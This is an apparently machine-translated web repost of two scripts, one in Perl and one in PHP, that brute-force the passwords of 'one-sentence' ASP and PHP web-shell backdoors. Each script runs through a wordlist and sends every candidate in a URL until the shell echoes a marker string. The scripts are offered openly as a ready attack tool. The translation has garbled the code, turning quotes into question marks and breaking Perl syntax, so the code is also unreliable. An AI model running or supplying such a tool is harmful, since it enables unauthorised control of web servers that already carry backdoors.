ASP & amp; PHP one-sentence Trojan password cracking script

Source: Internet
Author: User

ASP & PHP one-sentence Trojan password cracking script
The password cracking script for ASP & PHP single-statement Trojan is very pornographic and violent.

#/Usr/bin/perluse LWP: UserAgent; use HTTP: Request; use LWP: Simple; print? =========================================\ N ?; Print? \ N ?; Print? Crack. pl Url \ n ?; Print? \ N ?; Print? Crack. pl http://www.t00ls.in/1.asp \ N ?; Print? \ N ?; Print? Made By Cond0r QQ 84588307 \ n ?; Print? \ N ?; Print? =========================================\ N ?; Print? \ N ?; Print? Url Is :?; $ Ul = <STDIN>; chomp $ ul; open PASS ,? Pass.txt ?; $ A = 0; foreach $ pass (<PASS>) {@ pass [$ a] = $ pass; $ a ++; $ ua = new LWP: UserAgent; $ text =? \? QQ84588307 \? "; $ Url = $ ul .???. $ Pass .? = Response. write (?. $ Text .?)?; $ Req = new HTTP: Request (? GET ?, $ Url); print $ rep; $ respond = $ ua-> request ($ req)-> as_string; print? The Pass Is :?. $ Pass if ($ respond = ~ /QQ84588307/);} crack PHP one-sentence password for PHP <? Php/** Created on 2010-11-4 */set_time_limit (0); $ url = $ _ GET ['url']; $ passfile = $ _ GET ['upfile']; $ keyword =? Xxoo ?; // Keyword. It cannot be changed because the length of the content returned by http is $ c_l = get_headers ($ url, 1 ); // get the Content Length of the normal http header $ normal_c_l = $ c_l ['content-length']; if ($ url & $ passfile & $ keyword) {$ fp = fopen ($ passfile, r); while (! Feof ($ fp) {$ pass = trim (fgets ($ fp); $ all_url = $ url .???. $ Pass .? = Response. write (?.???. $ Keyword .??)?; $ Head_msg = get_headers ($ all_url, 1); if ($ head_msg ['content-length']> $ normal_c_l) {// if the Content Length is greater than normal, keyword is written, the password is out. echo? <Font color = red> password: $ pass </font> ?; Exit () ;}} fclose ($ fp) ;}?> <Html> 

 


Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.